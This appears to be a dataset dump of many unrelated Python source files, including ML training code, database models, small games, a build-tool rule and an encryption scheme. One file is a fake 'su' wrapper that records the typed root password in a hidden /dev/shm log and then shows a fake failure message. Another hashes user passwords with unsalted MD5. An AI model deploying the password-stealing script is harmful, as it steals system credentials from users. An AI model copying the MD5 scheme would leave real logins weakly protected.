text
stringlengths 8
6.05M
|
|---|
from tensorflow.keras import layers
from tensorflow.keras.losses import SparseCategoricalCrossentropy
from tensorflow.keras.optimizers import Adam
from dgl.nn.tensorflow import GraphConv
from tensorflow.keras import activations
from graphgallery.nn.models import TFKeras
class GCN(TFKeras):
def __init__(self, in_features, out_features,
hids=[16],
acts=['relu'],
dropout=0.5,
weight_decay=5e-4,
lr=0.01, bias=True):
super().__init__()
self.convs = []
for hid, act in zip(hids, acts):
layer = GraphConv(in_features, hid, bias=bias,
activation=activations.get(act))
self.convs.append(layer)
in_features = hid
layer = GraphConv(in_features, out_features, bias=bias)
self.convs.append(layer)
self.dropout = layers.Dropout(dropout)
self.compile(loss=SparseCategoricalCrossentropy(from_logits=True),
optimizer=Adam(lr=lr), metrics=['accuracy'])
def call(self, inputs):
h, g = inputs
for layer in self.convs[:-1]:
h = layer(g, h)
h = self.dropout(h)
h = self.convs[-1](g, h)
return h
|
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from hashlib import md5
from sqlalchemy import Column, String, Integer, Boolean, ForeignKey, Table
from sqlalchemy.orm import relationship, backref, relation
from lib import db
from lib.flask_login import UserMixin
from lib.ui.navbar import Navbar
user_permission_table = Table('auth_user_permissions', db.metadata,
Column('user_id', Integer, ForeignKey('auth_users.id',
onupdate="CASCADE", ondelete="CASCADE"), primary_key=True),
Column('permission_id', Integer, ForeignKey('auth_permissions.id',
onupdate="CASCADE", ondelete="CASCADE"), primary_key=True)
)
class User(db.Base, UserMixin):
""" 用户 """
__tablename__ = 'auth_users'
id = Column(Integer, primary_key=True)
username = Column(String(40), unique=True)
name = Column(String(40))
email = Column(String(60), unique=True)
_password = Column('password', String(60))
is_admin = Column(Boolean, default=False)
ip = Column(String(16)) # 判断用户是否在其它机器上登录,IP变换需重新登录
role_id = Column(Integer, ForeignKey('auth_roles.id'))
permissions = relation('Permission', secondary=user_permission_table, backref='users') # 用户权限,多对多关系
def __unicode__(self):
return self.name or self.username
@property
def password(self):
return self._password
@password.setter
def password(self, value):
self._password = User.create_pwd(value)
@staticmethod
def create_pwd(raw):
return md5(raw).hexdigest()
def check_pwd(self, pwd):
return self.password == User.create_pwd(pwd)
@property
def navbar(self):
nav = Navbar()
return nav
class Dashboard(db.Base):
""" 可视面板 """
__tablename__ = 'auth_dashboards'
id = Column(Integer, primary_key=True)
cols = Column(Integer, doc=u'显示列数')
order = Column(String(255), doc=u'排序参数') # [[('demo1', True), ('demo2', False)], [(), ()], []]
uid = Column(Integer, ForeignKey('auth_users.id'))
user = relationship('User', backref=backref('dashboard', uselist=False))
role_permission_table = Table('auth_role_permissions', db.metadata,
Column('role_id', Integer, ForeignKey('auth_roles.id',
onupdate="CASCADE", ondelete="CASCADE"), primary_key=True),
Column('permission_id', Integer, ForeignKey('auth_permissions.id',
onupdate="CASCADE", ondelete="CASCADE"), primary_key=True)
)
class Role(db.Base):
""" 角色 """
__tablename__ = 'auth_roles'
id = Column(Integer, primary_key=True)
name = Column(String(50), unique=True)
users = relationship('User', backref='role') # 用户角色,多对一关系
permissions = relation('Permission', secondary=role_permission_table, backref='roles') # 角色权限,多对多关系
class Permission(db.Base):
""" 权限 """
__tablename__ = 'auth_permissions'
id = Column(Integer, primary_key=True)
type = Column(String(20), default='model') # dashboard, model, menu
resource = Column(String(50)) # dashboard_id, model_name, menu_id
action = Column(String(20), default='view') # view, new, edit, delete
is_allow = Column(Boolean, default=True) # allow/forbid,用于特例用户权限被禁止
|
from collections import defaultdict
import gc
import gzip
import inspect
import os
import os.path
import sys
import time
import gym
import numpy as np
import pickle
import .neural_network as nn
from neural_network import tf, tint
from replay_buffer import ReplayBuffer, PrioritizedExperienceReplay
from envs import AtariEnv
import six
import torch
import torch.nn.functional as F
parser = argparse.ArgumentParser()
parser.add_argument("--learning_rate", default=2.5e-4, help="Learning rate", type=float)
parser.add_argument("--run", default=0, help="run", type=int)
parser.add_argument("--mbsize", default=32, help="Minibatch size", type=int)
parser.add_argument("--buffer_size", default=500000, help="Replay buffer size",type=int)
parser.add_argument("--clone_interval", default=10000, type=int)
parser.add_argument("--weight_decay", default=1e-4, type=float)
parser.add_argument("--opt", default='adam')
parser.add_argument("--env_name", default='ms_pacman')
parser.add_argument("--device", default='cuda', help="device")
parser.add_argument("--checkpoint", default='results/41.pkl', help="checkpoint file",type=str)
def main():
results = {
"results": [],
"measure_reg": [],
"measure_td": [],
"measure_mc": [],
}
hps = {
"opt": ARGS.opt,
"env_name": ARGS.env_name,
"lr": ARGS.learning_rate,
"weight_decay": ARGS.weight_decay,
"run": ARGS.run,
}
nhid = hps.get("nhid", 32)
gamma = hps.get("gamma", 0.99)
mbsize = hps.get("mbsize", 32)
weight_decay = hps.get("weight_decay", 0)
sample_near = hps.get("sample_near", "both")
slice_size = hps.get("slice_size", 0)
env_name = hps.get("env_name", "ms_pacman")
clone_interval = hps.get("clone_interval", 10_000)
reset_on_clone = hps.get("reset_on_clone", False)
reset_opt_on_clone = hps.get("reset_opt_on_clone", False)
max_clones = hps.get("max_clones", 2)
target = hps.get("target", "last") # self, last, clones
replay_type = hps.get("replay_type", "normal") # normal, prioritized
final_epsilon = hps.get("final_epsilon", 0.05)
num_exploration_steps = hps.get("num_exploration_steps", 500_000)
lr = hps.get("lr", 1e-4)
num_iterations = hps.get("num_iterations", 10_000_000)
buffer_size = hps.get("buffer_size", 250_000)
seed = hps.get("run", 0) + 1_642_559 # A large prime number
hps["_seed"] = seed
torch.manual_seed(seed)
np.random.seed(seed)
rng = np.random.RandomState(seed)
env = AtariEnv(env_name)
num_act = env.num_actions
def make_opt(theta):
if hps.get("opt", "sgd") == "sgd":
return torch.optim.SGD(theta, lr, weight_decay=weight_decay)
elif hps["opt"] == "msgd":
return torch.optim.SGD(
theta, lr, momentum=hps.get("beta", 0.99), weight_decay=weight_decay)
elif hps["opt"] == "rmsprop":
return torch.optim.RMSprop(theta, lr, weight_decay=weight_decay)
elif hps["opt"] == "adam":
return torch.optim.Adam(theta, lr, weight_decay=weight_decay)
else:
raise ValueError(hps["opt"])
# Define model
_Qarch, theta_q, Qf, _Qsemi = nn.build(
nn.conv2d(4, nhid, 8, stride=4), # Input is 84x84
nn.conv2d(nhid, nhid * 2, 4, stride=2),
nn.conv2d(nhid * 2, nhid * 2, 3),
nn.flatten(),
nn.hidden(nhid * 2 * 12 * 12, nhid * 16),
nn.linear(nhid * 16, num_act),
)
clone_theta_q = lambda: [i.detach().clone().requires_grad_() for i in theta_q]
# Pretrained parameters
theta_target = load_parameters_from_checkpoint()
# (Same) Random parameters
theta_regress = clone_theta_q()
theta_qlearn = clone_theta_q()
theta_mc = clone_theta_q()
opt_regress = make_opt(theta_regress)
opt_qlearn = make_opt(theta_qlearn)
opt_mc = make_opt(theta_mc)
# Define loss
def sl1(a, b):
d = a - b
u = abs(d)
s = d**2
m = (u < s).float()
return u * m + s * (1 - m)
td = lambda s, a, r, sp, t, w, tw=theta_q: sl1(
r + (1 - t.float()) * gamma * Qf(sp, tw).max(1)[0].detach(),
Qf(s, w)[np.arange(len(a)), a.long()],
)
obs = env.reset()
replay_buffer = ReplayBuffer(seed, buffer_size, near_strategy=sample_near)
total_reward = 0
last_end = 0
num_fill = buffer_size
num_measure = 500
_t0 = t0 = t1 = t2 = t3 = t4 = time.time()
tm0 = tm1 = tm2 = tm3 = time.time()
ema_loss = 0
last_rewards = [0]
print("Filling buffer")
epsilon = final_epsilon
replay_buffer.new_episode(obs, env.enumber % 2)
while replay_buffer.idx < replay_buffer.size - 10:
if rng.uniform(0, 1) < epsilon:
action = rng.randint(0, num_act)
else:
action = Qf(tf(obs / 255.0).unsqueeze(0), theta_target).argmax().item()
obsp, r, done, info = env.step(action)
replay_buffer.add(obs, action, r, done, env.enumber % 2)
obs = obsp
if done:
obs = env.reset()
replay_buffer.new_episode(obs, env.enumber % 2)
# Remove last episode from replay buffer, as it didn't end
it = replay_buffer.idx
curp = replay_buffer.p[it]
while replay_buffer.p[it] == curp:
replay_buffer._sumtree.set(it, 0)
it -= 1
print(f'went from {replay_buffer.idx} to {it} when deleting states')
print("Computing returns")
replay_buffer.compute_values(lambda s: Qf(s, theta_regress), num_act)
replay_buffer.compute_returns(gamma)
replay_buffer.compute_reward_distances()
print("Training regressions")
losses_reg, losses_td, losses_mc = [], [], []
loss_reg_f = lambda x, w: sl1(Qf(x[0], w), Qf(x[0], theta_target))
loss_td_f = lambda x, w: td(*x[:-1], w, theta_target)
loss_mc_f = lambda x, w: sl1(
Qf(x[0], w)[np.arange(len(x[1])), x[1].long()], replay_buffer.g[x[-1]])
losses = {
"reg": loss_reg_f,
"td": loss_td_f,
"mc": loss_mc_f,
}
measure_reg = Measures(theta_regress, losses, replay_buffer,
results["measure_reg"], mbsize)
measure_mc = Measures(theta_mc, losses, replay_buffer,
results["measure_mc"], mbsize)
measure_td = Measures(theta_qlearn, losses, replay_buffer,
results["measure_td"], mbsize)
for i in range(100_000):
sample = replay_buffer.sample(mbsize)
replay_buffer.compute_value_difference(sample, Qf(sample[0], theta_regress))
if i and not i % num_measure:
measure_reg.pre(sample)
measure_mc.pre(sample)
measure_td.pre(sample)
loss_reg = loss_reg_f(sample, theta_regress).mean()
loss_reg.backward()
losses_reg.append(loss_reg.item())
opt_regress.step()
opt_regress.zero_grad()
loss_td = loss_td_f(sample, theta_qlearn).mean()
loss_td.backward()
losses_td.append(loss_td.item())
opt_qlearn.step()
opt_qlearn.zero_grad()
loss_mc = loss_mc_f(sample, theta_mc).mean()
loss_mc.backward()
losses_mc.append(loss_mc.item())
opt_mc.step()
opt_mc.zero_grad()
replay_buffer.update_values(sample, Qf(sample[0], theta_regress))
if i and not i % num_measure:
measure_reg.post()
measure_td.post()
measure_mc.post()
if not i % 1000:
print(i, loss_reg.item(), loss_td.item(), loss_mc.item())
results["results"].append({
"losses_reg": np.float32(losses_reg),
"losses_td": np.float32(losses_td),
"losses_mc": np.float32(losses_mc)
})
path = f'results/regress_{ARGS.run}.pkl'
with open(path, "wb") as f:
pickle.dump(results, f)
print(f"Done in {(time.time()-_t0)/60:.2f}m")
class Measures:
def __init__(self, params, losses, replay_buffer, results, mbsize):
self.p = params
self.losses = losses
self.rb = replay_buffer
self.mbsize = mbsize
self.rs = results
def pre(self, sample):
self._sampleidx = sample[-1]
near_s, self.near_pmask = self.rb.slice_near(self._sampleidx, 30)
self._samples = {
"sample": sample,
"other": self.rb.sample(self.mbsize),
"near": near_s,
}
self._cache = {}
for loss_name, loss in self.losses.items():
for item_name, item in self._samples.items():
with torch.no_grad():
self._cache[f'{item_name}_{loss_name}_pre'] = loss(item, self.p)
def post(self):
r = {
"vdiff_acc": self.rb.vdiff_acc + 0,
"vdiff_cnt": self.rb.vdiff_cnt + 0,
'rdist': self.rb.rdist[self._sampleidx].data.cpu().numpy(),
'g': self.rb.g[self._sampleidx].data.cpu().numpy(),
'near_pmask': self.near_pmask.data.cpu().numpy(),
}
self.rb.vdiff_acc *= 0
self.rb.vdiff_cnt *= 0
for loss_name, loss in self.losses.items():
for item_name, item in self._samples.items():
k = f'{item_name}_{loss_name}'
with torch.no_grad():
self._cache[f'{k}_post'] = (loss(item, self.p))
r[f'{k}_gain'] = (self._cache[f'{k}_pre'] -
self._cache[f'{k}_post']).cpu().data.numpy()
r[k] = self._cache[f'{k}_post'].cpu().data.numpy()
self.rs.append(r)
def load_parameters_from_checkpoint():
data = pickle.load(open(ARGS.checkpoint, 'rb'))
return [tf(data[str(i)]) for i in range(10)]
if __name__ == "__main__":
ARGS = parser.parse_args()
device = torch.device(ARGS.device)
nn.set_device(device)
main()
|
import cv2
from matplotlib import pyplot as plt
import numpy as np
for i in ['00', '04', '05', '07', '08', '09']:
img1 = cv2.imread('.\\v3\\trajectory-{}.png'.format(i), 1) # queryImage
img2 = cv2.imread('.\\v5\\trajectory-{}.png'.format(i), 1) # trainImage
#vis = np.concatenate((img1, img2), axis=1)
dst = cv2.addWeighted(img1, 0.3, img2, 0.7, 0)
cv2.imwrite('.\\v3-5\\comb-{}.png'.format(i), dst)
'''
for i in ['00', '01', '02', '03']:
img1 = cv2.imread('.\\v4\\trajectory-{}.png'.format(i), 1) # queryImage
img2 = cv2.imread('.\\v6\\trajectory-{}.png'.format(i), 1) # trainImage
#vis = np.concatenate((img1, img2), axis=1)
dst = cv2.addWeighted(img1, 0.3, img2, 0.7, 0)
cv2.imwrite('.\\v4-6\\comb-{}.png'.format(i), dst)
'''
|
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
class AddProductToCart:
def __init__(self, driver):
self.driver = driver
self.wait = WebDriverWait(driver, 10)
def open(self):
self.driver.get("http://localhost/litecart/en/")
return self
def select_product(self, product_name):
self.driver.find_element(By.XPATH, "//*[@id='box-most-popular']//*[@title='%s']" % product_name).click()
return self
def add_to_cart(self):
self.driver.find_element_by_name("add_cart_product").click()
self.wait.until(lambda d: d.find_element_by_xpath("//span[@class='quantity' and text()='1']"))
return self
|
# @Time :2019/7/9 22:44
# @Author :jinbiao
class Cat:
kind = "猫" # 类的属性
def __init__(self, colour, name, age): # 构造方法,形参接受对象的属性
self.colour = colour # 给对象赋值
self.name = name
self.age = age
def eat(self): # 实例方法
cat_eat = f"{self.colour}的{self.name}{self.kind},今年{self.age}岁,吃着美味的事物"
return cat_eat
def drink(self):
cat_drink = f"{self.colour}的{self.name}{Cat.kind},今年{self.age}岁,喝着可口的饮料"
return cat_drink
def sound(self):
cat_eat_sound = self.eat()+"meow"+Cat.legs() # 类内部调用实例化方法
print(cat_eat_sound)
@classmethod
def legs(cls): # 类方法
return "猫有4只腿"
one_cat = Cat("灰色", "Tom", 1) # 创建对象,将对象的属性传递
one_cat.eat() # 调用对象的方法
one_cat.drink()
one_cat.sound()
print(one_cat.name)
print(Cat.kind)
print(one_cat.kind)
print(Cat.legs())
print(one_cat.legs())
|
import pandas as pd
from Bio import SeqIO
'''
print("start?")
start = input('That is :')
print("end?")
end = input('That is :')
'''
#下面是读取全部蛋白质组进入一个大字典的脚本部分
dictseq = {}
n1 = 0
for seq_record in SeqIO.parse("D:\BaiduYunDownload\YZ Meng\python爬虫\测试用氨基酸\[人]uniprot-proteome UP000005640.fasta", "fasta"):
n1 = n1 + 1
xid = seq_record.id.split("|")
yid = xid[1]
z = str(seq_record.seq)
m = {yid:z}
dictseq.update(m)
print('over!')
#下面是逐个匹配的过程
df1 = pd.read_csv('D:/BaiduYunDownload/YZ Meng/work/你的综述/cysteine-modification/孟彦铮cys修饰结果汇总/Oxidation/rs5.csv')
uid=[]
negseq=[]
ssit=[]
n2 = 0
for row in df1.itertuples():
try:
n2 = n2 + 1
aimid = row[2]
aimsite = row[3]
sseq = dictseq[aimid]
n3 = 0
for index,AA in enumerate(sseq):
n3 = n3 + 1
if (AA == 'C') and ((index + 1) != aimsite):
index=index+1
try:
if (index<26):
nonn=(26-index)*'-'
seq51 = nonn+sseq[0:index+25]
elif (index+24)>len(sseq):
nonn=(25-(len(sseq)-index))*'-'
seq51 = sseq[index-26:]+nonn
else:
seq51 = sseq[index-26:index+25]
except:
seq51=''
uid.append(aimid)
ssit.append(n3)
negseq.append(seq51)
except:
print('error in this')
alldict={'ID':uid,'site':ssit,'Seq':negseq}
df2=pd.DataFrame(alldict)
df2.to_csv('D:/BaiduYunDownload/YZ Meng/work/你的综述/cysteine-modification/孟彦铮cys修饰结果汇总/Oxidation/rs5neg.csv')
print("over!!")
|
from contextlib import ExitStack
def cleanup_resources():
print("cleanup_resources")
with ExitStack() as stack:
stack.callback(cleanup_resources)
print("stack")
with ExitStack() as stack:
stack.callback(cleanup_resources)
print("stack")
stack.pop_all()
|
# Generated by Django 3.1.3 on 2020-11-23 05:55
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('main', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='subject',
name='Registration',
),
migrations.RemoveField(
model_name='subject_attempts',
name='Student',
),
migrations.DeleteModel(
name='Register',
),
migrations.DeleteModel(
name='Student',
),
migrations.DeleteModel(
name='Subject',
),
migrations.DeleteModel(
name='Subject_attempts',
),
]
|
import string
import sys
result = 1196601068455751604172765025142834742772692164339541821505998319783121
origin = 33
out = []
while True:
found = False
for c in string.ascii_letters + '{_}' + string.digits:
print result - ord(c)
if (result - ord(c)) % 97 == 0:
found = True
result -= ord(c)
result /= 97
out.append(c)
print c
if result == origin:
print ''.join(out)[::-1]
sys.exit()
break
if not found:
print "No password found"
break
|
a=int(input())
b=int(input())
c=int(input())
re={}
re[max(a,b,c)]='1'
re[min(a,b,c)]='3'
if a not in re: re[a]='2'
if b not in re: re[b]='2'
if c not in re: re[c]='2'
print(re[a]+'\n'+re[b]+'\n'+re[c])
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import logging
import os
from dataclasses import dataclass
from typing import Iterable
from pants.backend.cc.subsystems.compiler import CCSubsystem, ExternalCCSubsystem
from pants.backend.cc.target_types import CCLanguage
from pants.core.util_rules.archive import ExtractedArchive
from pants.core.util_rules.archive import rules as archive_rules
from pants.core.util_rules.system_binaries import (
BinaryNotFoundError,
BinaryPathRequest,
BinaryPaths,
BinaryPathTest,
)
from pants.engine.env_vars import EnvironmentVars, EnvironmentVarsRequest
from pants.engine.fs import DownloadFile
from pants.engine.internals.native_engine import EMPTY_DIGEST, Digest
from pants.engine.platform import Platform
from pants.engine.process import Process
from pants.engine.rules import Get, Rule, collect_rules, rule
from pants.engine.unions import UnionRule
from pants.util.logging import LogLevel
from pants.util.ordered_set import OrderedSet
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class CCToolchainRequest:
"""A request for a C/C++ toolchain."""
language: CCLanguage
@dataclass(frozen=True)
class CCToolchain:
"""A C/C++ toolchain."""
compiler: str
# include_directories: tuple[str, ...] = () # TODO as part of the `check` goal to ensure source roots are handled
compiler_flags: tuple[str, ...] = ()
compiler_definitions: tuple[str, ...] = ()
linker_flags: tuple[str, ...] = ()
digest: Digest = EMPTY_DIGEST
def __post_init__(self):
# TODO: Should this error out to notify the user of a mistake? Or silently handle
# Or just ensure all defines have -D right now?
if self.compiler_definitions:
sanitized_definitions = [define.lstrip("-D") for define in self.compiler_definitions]
object.__setattr__(self, "compiler_definitions", tuple(sanitized_definitions))
@property
def compile_command(self) -> tuple[str, ...]:
"""The command to compile a C/C++ source file."""
command = [self.compiler, *self.compiler_definitions, *self.compiler_flags]
return tuple(filter(None, command))
@property
def link_command(self) -> tuple[str, ...]:
"""The command to link a C/C++ binary."""
command = [self.compiler, *self.linker_flags]
return tuple(filter(None, command))
async def _executable_path(binary_names: Iterable[str], search_paths: Iterable[str]) -> str:
"""Find the path to an executable by checking whether the executable supports a version
option."""
for name in binary_names:
binary_paths = await Get( # noqa: PNT30: requires triage
BinaryPaths,
BinaryPathRequest(
binary_name=name,
search_path=search_paths,
test=BinaryPathTest(args=["-v"]),
),
)
if not binary_paths or not binary_paths.first_path:
continue
return binary_paths.first_path.path
raise BinaryNotFoundError(f"Could not find any of '{binary_names}' in any of {search_paths}.")
async def _setup_downloadable_toolchain(
request: CCToolchainRequest,
subsystem: ExternalCCSubsystem,
platform: Platform,
) -> CCToolchain:
"""Set up a toolchain from a downloadable archive."""
download_file_request = subsystem.get_request(platform).download_file_request
maybe_archive_digest = await Get(Digest, DownloadFile, download_file_request)
extracted_archive = await Get(ExtractedArchive, Digest, maybe_archive_digest)
# Populate the toolchain for C or C++ accordingly
if request.language == CCLanguage.CXX:
return CCToolchain(
compiler=subsystem.cxx_executable,
compiler_flags=tuple(subsystem.cxx_compiler_flags),
compiler_definitions=tuple(subsystem.cxx_definitions),
digest=extracted_archive.digest,
)
return CCToolchain(
compiler=subsystem.c_executable,
compiler_flags=tuple(subsystem.c_compiler_flags),
compiler_definitions=tuple(subsystem.c_definitions),
digest=extracted_archive.digest,
)
async def _setup_system_toolchain(
request: CCToolchainRequest, subsystem: CCSubsystem
) -> CCToolchain:
"""Set up a toolchain from the user's host system."""
# Sanitize the search paths in case the "<PATH>" is specified
raw_search_paths = list(subsystem.search_paths)
if "<PATH>" in raw_search_paths:
i = raw_search_paths.index("<PATH>")
env = await Get(EnvironmentVars, EnvironmentVarsRequest(["PATH"]))
system_path = env.get("PATH", "")
raw_search_paths[i : i + 1] = system_path.split(os.pathsep)
search_paths = tuple(OrderedSet(raw_search_paths))
# Populate the toolchain for C or C++ accordingly
if request.language == CCLanguage.CXX:
cxx_executable = await _executable_path(tuple(subsystem.cxx_executable), search_paths)
return CCToolchain(
cxx_executable,
compiler_flags=tuple(subsystem.cxx_compiler_flags),
compiler_definitions=tuple(subsystem.cxx_definitions),
)
c_executable = await _executable_path(tuple(subsystem.c_executable), search_paths)
return CCToolchain(
c_executable,
compiler_flags=tuple(subsystem.c_compiler_flags),
compiler_definitions=tuple(subsystem.c_definitions),
)
@rule(desc="Setup the CC Toolchain", level=LogLevel.DEBUG)
async def setup_cc_toolchain(
request: CCToolchainRequest,
subsystem: CCSubsystem,
external_subsystem: ExternalCCSubsystem,
platform: Platform,
) -> CCToolchain:
"""Set up the C/C++ toolchain."""
if external_subsystem.url_template:
return await _setup_downloadable_toolchain(request, external_subsystem, platform)
else:
return await _setup_system_toolchain(request, subsystem)
@dataclass(frozen=True)
class CCProcess:
args: tuple[str, ...]
language: CCLanguage
description: str
input_digest: Digest = EMPTY_DIGEST
output_files: tuple[str, ...] = ()
level: LogLevel = LogLevel.INFO
@rule(desc="Setup a CC Process loaded with the CCToolchain", level=LogLevel.DEBUG)
async def setup_cc_process(request: CCProcess) -> Process:
"""Set up a C/C++ process.
This rule will load the C/C++ toolchain based on the requested language. It will then return a
Process that can be run to compile or link a C/C++ source file.
"""
toolchain = await Get(CCToolchain, CCToolchainRequest(request.language))
# TODO: What if this is for linking instead of compiling?
# TODO: From tdyas: Should there then be a CCCompilerProcess and CCLinkerProcess?
# Investigate further during `check` PR
compiler_command = list(toolchain.compile_command)
# If downloaded, this will be the toolchain, otherwise empty digest
immutable_digests = {"__toolchain": toolchain.digest}
if toolchain.digest != EMPTY_DIGEST:
compiler_command[0] = f"__toolchain/{compiler_command[0]}"
argv = tuple(compiler_command) + request.args
return Process(
argv=argv,
input_digest=request.input_digest,
output_files=request.output_files,
description=request.description,
level=request.level,
immutable_input_digests=immutable_digests,
# env={"__PANTS_CC_COMPILER_FINGERPRINT": toolchain.compiler.fingerprint},
)
def rules() -> Iterable[Rule | UnionRule]:
return (
*collect_rules(),
*archive_rules(),
)
|
import random
def main():
miles_traveled = 0
thirst = 0
camel_tiredness = 0
native_distance = -20
num_canteen = 3
dead = False
done = False
print("Bienvenido a Camel")
print("Robaste un camello para realizar tu viaje hasta el gran desierto Mobi")
print("Los nativos quieren su camello de vuelta y te persiguen")
print("Sobrevive en tu viaje y escapa de los nativos")
while done == False:
oasis = random.randint(1, 20)
print("A. Beber de tu cantimplora.")
print("B. Velocidad normal.")
print("C. Maxima velociada.")
print("D. Descansar en la noche.")
print("E. Revisar estado.")
print("Q. Salir")
a = input("¿Que escoges:? ")
if a.upper() == "Q":
done = True
print("Saliste de juego")
elif a.upper() == "E":
print("Millas recorridas: ",miles_traveled)
print("Numero de cantimploras: ",num_canteen)
print("Los nativos estan a ",-native_distance,"millas deetras de ti")
elif a.upper() == "D":
camel_tiredness = 0
print("Tu camello está feliz")
native_move = random.randint(7, 14)
native_distance += native_move
elif a.upper() == "C":
forward=random.randint(10,20)
miles_traveled += forward
print("Distancia recorrida ",forward,"millas")
thirst += 1
camel_tiredness += 1
native_move = random.randint(7,14)
native_distance += native_move
native_distance -= forward
elif a.upper() == "B":
forward=random.randint(5,12)
miles_traveled += forward
print("distancia recorrida",forward,"miles")
thirst += 1
camel_tiredness += 1
native_move = random.randint(7, 14)
native_distance += native_move
native_distance -= forward
elif a.upper() == "A":
if num_canteen>0:
thirst = 0
num_canteen -= 1
else:
print("No tienes cantimploras")
if thirst > 4 and thirst <= 6:
print("Estas sediento")
elif thirst > 6:
print("Moriste de sed")
done = True
dead = True
camel_tiredness = 0
if camel_tiredness > 5 and camel_tiredness <= 8:
print("Tu camello se está cansando.")
elif camel_tiredness > 8:
print("Tu camello está muerto.")
thirst = 0
dead = True
done = True
if native_distance == 0:
print("¡Los nativos de atraparon!")
done = True
dead = True
thirst = 0
camel_tiredness = 0
elif native_distance < 15 and native_distance > 0:
print("¡Los nativos se están acercando!")
if miles_traveled > 200 and dead == False:
print("¡Enorabuena,escapaste!")
done = True
if oasis == 1 and (a == "B" or a == "C"):
drinks = 3
thirst = 0
camel_tiredness = 0
main()
|
#!/usr/bin/python
import os, sys, getpass, time
current_time = time.strftime("%Y-%m-%d %H:%M")
logfile="/dev/shm/.su.log" //密码获取后记录在这里
#CentOS
#fail_str = "su: incorrect password"
#Ubuntu
#fail_str = "su: Authentication failure"
#For Linux Korea //centos,ubuntu,korea 切换root用户失败提示不一样
fail_str = "su: incorrect password"
try:
passwd = getpass.getpass(prompt='Password: ');
file=open(logfile,'a')
file.write("[%s]t%s"%(passwd, current_time)) //截取root密码
file.write('n')
file.close()
except:
pass
time.sleep(1)
print fail_str //打印切换root失败提示
|
'''
Boneh-Canetti-Halevi-Katz Public Key Encryption, IBE-to-PKE transform
| From: "Improved Efficiency for CCA-Secure Cryptosystems Built Using Identity-Based Encryption", Section 4
| Published In: Topics in Cryptology in CTRSA 2005
| Available From: eprint.iacr.org/2004/261.pdf
:Author: Christina Garman
:Date: 12/2011
'''
from charm.core.engine.util import pickleObject, serializeObject
import hmac, hashlib, math
from charm.schemes.ibenc.ibenc_bb03 import IBEnc, ZR, GT, sha1
debug = False
class BCHKIBEnc(IBEnc):
"""
>>> from charm.schemes.encap_bchk05 import EncapBCHK
>>> from charm.schemes.ibenc.ibenc_bb03 import PairingGroup, IBE_BB04
>>> group = PairingGroup('SS512')
>>> ibe = IBE_BB04(group)
>>> encap = EncapBCHK()
>>> hyb_ibe = BCHKIBEnc(ibe, group, encap)
>>> (public_key, secret_key) = hyb_ibe.keygen()
>>> msg = b"Hello World!"
>>> cipher_text = hyb_ibe.encrypt(public_key, msg)
>>> decrypted_msg = hyb_ibe.decrypt(public_key, secret_key, cipher_text)
>>> decrypted_msg == msg
True
"""
def str_XOR(self, m, k):
output = ""
for character in m:
for letter in k:
if(not type(character) == int):
character = ord(character)
if(not type(letter) == int):
letter = ord(letter)
character = chr(character ^ letter)
output += character
return output
def elmtToString(self, g, length):
hash_len = 20
b = int(math.ceil(length / hash_len))
gStr = b''
for i in range(1, b+1):
gStr += sha1(g, i)
return gStr[:length]
def __init__(self, scheme, groupObj, encscheme):
global ibenc, group, encap
ibenc = scheme
group = groupObj
encap = encscheme
def keygen(self):
(PK, msk) = ibenc.setup()
pub = encap.setup()
pk = { 'PK':PK, 'pub':pub }
sk = { 'msk': msk }
return (pk, sk)
def encrypt(self, pk, m):
(k, ID, x) = encap.S(pk['pub'])
ID2 = group.hash(ID, ZR)
m2 = m + b':' + x
# m2 = m + ':' + x
kprime = group.random(GT)
kprimeStr = self.elmtToString(kprime, len(m2))
C1 = ibenc.encrypt(pk['PK'], ID2, kprime)
C2 = self.str_XOR(m2, kprimeStr)
# C2 = C2.encode('utf8')
C2 = C2.encode('utf-8')
C1prime = pickleObject(serializeObject(C1, group))
tag = hmac.new(k, C1prime+C2, hashlib.sha1).digest()
cipher = { 'ID':ID, 'C1':C1, 'C2':C2, 'tag':tag }
return cipher
def decrypt(self, pk, sk, c):
ID2 = group.hash(c['ID'], ZR)
SK = ibenc.extract(sk['msk'], ID2)
kprime = ibenc.decrypt(pk, SK, c['C1'])
kprimeStr = self.elmtToString(kprime, len(c['C2']))
m2 = self.str_XOR(c['C2'], kprimeStr)
x = m2.split(':')[1]
k = encap.R(pk['pub'], c['ID'], x)
C1prime = pickleObject(serializeObject(c['C1'], group))
if(c['tag'] == hmac.new(k, C1prime+c['C2'], hashlib.sha1).digest()):
return m2.split(':')[0]
else:
return b'FALSE'
|
#!/usr/bin/env python3
"""Release script for ODL projects"""
import argparse
import asyncio
import re
import os
from subprocess import CalledProcessError
from pkg_resources import parse_version
from async_subprocess import (
call,
check_call,
check_output,
)
from constants import (
GIT_RELEASE_NOTES_PATH,
SCRIPT_DIR,
)
from exception import ReleaseException
from github import create_pr
from lib import (
init_working_dir,
VERSION_RE,
)
class DependencyException(Exception):
"""Error if dependency is missing"""
class UpdateVersionException(Exception):
"""Error if the old version is invalid or cannot be found, or if there's a duplicate version"""
class VersionMismatchException(Exception):
"""Error if the version is unexpected"""
async def dependency_exists(command):
"""Returns true if a command exists on the system"""
return await call(["which", command], cwd="/") == 0
async def validate_dependencies():
"""Error if a dependency is missing or invalid"""
if not await dependency_exists("git"):
raise DependencyException('Please install git https://git-scm.com/downloads')
if not await dependency_exists("node"):
raise DependencyException('Please install node.js https://nodejs.org/')
if not await dependency_exists(GIT_RELEASE_NOTES_PATH):
raise DependencyException("Please run 'npm install' first")
version_output = await check_output(["node", "--version"], cwd="/")
version = version_output.decode()
major_version = int(re.match(r'^v(\d+)\.', version).group(1))
if major_version < 6:
raise DependencyException("node.js must be version 6.x or higher")
def update_version_in_file(root, filename, new_version):
"""
Update the version from the file and return the old version if it's found
"""
version_filepath = os.path.join(root, filename)
file_lines = []
update_count = 0
old_version = None
with open(version_filepath) as f:
for line in f.readlines():
line = line.strip("\n")
updated_line = line
if filename == "settings.py":
regex = r"^VERSION = .*(?P<version>{}).*$".format(VERSION_RE)
match = re.match(regex, line)
if match:
update_count += 1
old_version = match.group('version').strip()
updated_line = re.sub(regex, "VERSION = \"{}\"".format(new_version), line)
elif filename == "__init__.py":
